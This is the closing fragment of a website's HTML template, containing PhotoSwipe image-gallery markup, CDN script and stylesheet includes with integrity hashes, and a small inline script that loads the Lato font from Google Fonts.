                <button class="pswp__button pswp__button--zoom" title="Zoom in/out"></button>

                
                
                <div class="pswp__preloader">
                    <div class="pswp__preloader__icn">
                        <div class="pswp__preloader__cut">
                            <div class="pswp__preloader__donut"></div>
                        </div>
                    </div>
                </div>
            </div>

            <div class="pswp__share-modal pswp__share-modal--hidden pswp__single-tap">
                <div class="pswp__share-tooltip"></div>
            </div>

            <button class="pswp__button pswp__button--arrow--left" title="Previous (arrow left)">
            </button>

            <button class="pswp__button pswp__button--arrow--right" title="Next (arrow right)">
            </button>

            <div class="pswp__caption">
                <div class="pswp__caption__center"></div>
            </div>

        </div>

    </div>

</div><script 
                src="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe.min.js"integrity="sha256-ePwmChbbvXbsO02lbM3HoHbSHTHFAeChekF1xKJdleo="crossorigin="anonymous"
                defer="true"
                >
            </script><script 
                src="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe-ui-default.min.js"integrity="sha256-UKkzOn/w1mBxRmLLGrSeyB4e1xbrp4xylgAWb3M42pU="crossorigin="anonymous"
                defer="true"
                >
            </script><link 
                rel="stylesheet" 
                href="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/default-skin/default-skin.css"integrity="sha256-c0uckgykQ9v5k&#43;IqViZOZKc47Jn7KQil4/MP3ySA3F8="crossorigin="anonymous"
            ><link 
                rel="stylesheet" 
                href="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe.css"integrity="sha256-SBLU4vv6CA6lHsZ1XyTdhyjJxCjPif/TRkjnsyGAGnE="crossorigin="anonymous"
            >

            </main>
        </div>
        <script 
                src="https://cdn.jsdelivr.net/npm/node-vibrant@3.1.5/dist/vibrant.min.js"integrity="sha256-5NovOZc4iwiAWTYIFiIM7DxKUXKWvpVEuMEPLzcm5/g="crossorigin="anonymous"
                defer="false"
                >
            </script><script type="text/javascript" src="/ts/main.js" defer></script>
<script>
    (function () {
        const customFont = document.createElement('link');
        customFont.href = "https://fonts.googleapis.com/css2?family=Lato:wght@300;400;700&display=swap";

        customFont.type = "text/css";
        customFont.rel = "stylesheet";

        document.head.appendChild(customFont);
    }());
</script>

    </body>
</html>
